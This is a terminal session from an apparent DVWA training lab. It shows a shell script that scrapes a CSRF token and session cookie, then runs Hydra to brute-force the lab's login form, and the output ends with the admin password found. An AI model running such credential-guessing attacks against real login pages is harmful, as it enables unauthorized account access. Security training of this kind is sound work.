root@kali:~# cat hydraattack.sh
CSRF=$(curl -s -c dvwa.cookie "localhost/dvwa/login.php" | awk -F 'value=' '/user_token/ {print $2}' | cut -d "'" -f2)
#取得csrf token
SESSIONID=$(grep PHPSESSID dvwa.cookie | awk -F ' ' '{print $7}')
#取得sessionid
curl -s -b dvwa.cookie -d "username=admin&password=password&user_token=${CSRF}&Login=Login" "localhost/dvwa/login.php"
#登录维护
hydra -l admin -P /root/password \
-e ns -F -u -t 1 -w 10 -v -V localhost http-get-form \
"/dvwa/vulnerabilities/brute/:username=admin&password=^PASS^&Login=Login:S=Welcome to the password protected area:H=Cookie\: security=low; PHPSESSID=${SESSIONID}"
root@kali:~# sh hydraattack.sh
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-06-14 17:20:03
[INFORMATION] escape sequence \: detected in module option, no parameter verification is performed.
[DATA] max 1 task per 1 server, overall 64 tasks, 21 login tries (l:1/p:21), ~0 tries per task
[DATA] attacking service http-get-form on port 80
[VERBOSE] Resolving addresses ... done
[ATTEMPT] target localhost - login "admin" - pass "admin" - 1 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "" - 2 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "a" - 3 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "ab" - 4 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "abc" - 5 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "abcd" - 6 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "abcde" - 7 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "abcedf" - 8 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "abcdef" - 9 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "abcdefg" - 10 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "bc" - 11 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "bcd" - 12 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "bcde" - 13 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "bcdef" - 14 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "bcdefg" - 15 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "cd" - 16 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "cde" - 17 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "cdef" - 18 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "cdefg" - 19 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "cdefgh" - 20 of 21 [child 0]
[ATTEMPT] target localhost - login "admin" - pass "password" - 21 of 21 [child 0]
[80][http-get-form] host: localhost login: admin password: password
[STATUS] attack finished for localhost (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (http://www.thc.org/thc-hydra) finished at 2016-06-14 17:20:03
原文见:
https://blog.g0tmi1k.com/dvwa/bruteforce-low/